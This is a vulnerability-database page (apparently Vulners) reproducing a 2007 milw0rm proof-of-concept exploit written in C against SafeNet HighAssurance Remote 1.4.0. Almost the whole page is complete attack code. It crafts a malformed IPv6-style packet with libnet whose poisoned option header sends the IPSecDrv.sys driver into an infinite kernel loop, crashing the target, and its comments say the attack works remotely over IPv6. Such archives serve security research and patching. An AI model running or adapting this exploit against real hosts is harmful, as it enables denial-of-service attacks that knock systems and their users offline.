Vulners
Lucene search
SafeNet High Assurance Remote 1.4.0 - 'IPSecDrv.sys' Remote Denial of Service
/* safenet-dos.c
*
* SafeNet HighAssurance Remote ~1.4.0 Ring0 DoS (win32)
* by John Anderson <[email protected]>
* mu-b <[email protected]>
* - Mar 2006 - June 2007
*
* - Tested on: SafeNet HighAssurance Remote 1.4.0 (Build 12) (win32)
*
* Kernel level (Ring0) DoS in IPv6 support of IPSecDrv.sys
* (causes an infinite loop in searching option headers 0x1000BEB0).
*
* This POC only works on a local subnet since it sends an invalid packet
* and any sensible router will drop it. However, this is exploitable
* remotely with IPv6.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <libnet.h>
#include <sys/time.h>
#define IPV4_HDR_LEN 20
#define IPV6_HDR_LEN 40
#define UDP_LEN 16
struct opt
{
u_char nxt_hdr;
u_char opt_len;
};
unsigned long int
lookup (char *hostname)
{
struct hostent *name;
unsigned long int address;
if ((address = inet_addr (hostname)) != -1)
return address;
if ((name = gethostbyname (hostname)) == NULL)
return -1;
memcpy (&address, name->h_addr, name->h_length);
return (address);
}
int
main (int argc, char **argv)
{
u_char *buf = NULL;
/* libnet vars */
char errbuf[LIBNET_ERRBUF_SIZE];
libnet_t *lnsock;
char *device = NULL;
/* packet vars */
struct ip *ip_hdr = NULL;
struct opt *opt_hdr = NULL;
u_int32_t src_ip = 0, dst_ip = 0;
printf ("SafeNet HighAssurance Remote ~1.4.0 Ring0 DoS POC\n"
"by John Anderson <[email protected]>\n"
" mu-b <[email protected]>\n\n");
if (!argv[1])
{
printf ("Usage: %s <destination> [source]\n", argv[0]);
exit (EXIT_FAILURE);
}
/* allocate space for packet */
if ((buf = malloc (IPV6_HDR_LEN + UDP_LEN)) == NULL)
{
perror ("malloc: ");
exit (EXIT_FAILURE);
}
/* initialise libnet */
lnsock = libnet_init (LIBNET_RAW4_ADV, device, errbuf);
if (lnsock == NULL)
{
fprintf (stderr, "libnet_init() failed: %s", errbuf);
exit (-1);
}
if (!argv[2])
src_ip = lookup ("127.0.0.1");
else
src_ip = lookup (argv[2]);
dst_ip = lookup (argv[1]);
/* Build the pseudo-IPv4 header */
memset (buf, 0, sizeof buf);
ip_hdr = (struct ip *) buf;
ip_hdr->ip_v = 6;
ip_hdr->ip_hl = 0;
ip_hdr->ip_tos = 0;
ip_hdr->ip_len = htons (IPV6_HDR_LEN + UDP_LEN);
ip_hdr->ip_id = htons (0);
ip_hdr->ip_off = htons (0);
ip_hdr->ip_ttl = 0;
ip_hdr->ip_p = 0;
ip_hdr->ip_sum = 0;
ip_hdr->ip_src.s_addr = src_ip;
ip_hdr->ip_dst.s_addr = dst_ip;
/* Build option header with poison bytes */
opt_hdr = (struct opt *) (buf + IPV6_HDR_LEN);
opt_hdr->nxt_hdr = 0x3C; /* != 0x3B */
opt_hdr->opt_len = 0x07; /* length n such that:-
*(((u_char *)opt_hdr) + n * 2) != 0x3B &&
*(((u_char *)opt_hdr) + n * 2 + 1) == 0x00 &&
n * 2 < IPV6_HDR_LEN + UDP_LEN */
/* a value of 0x00 will suffice!@$%! */
printf ("Attacking %s", argv[1]);
libnet_write_raw_ipv4 (lnsock, buf, IPV6_HDR_LEN + UDP_LEN);
printf (".\n");
return (EXIT_SUCCESS);
}
// milw0rm.com [2007-06-08]Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Jun 2007 00:00Current
7.4High risk
Vulners AI Score7.4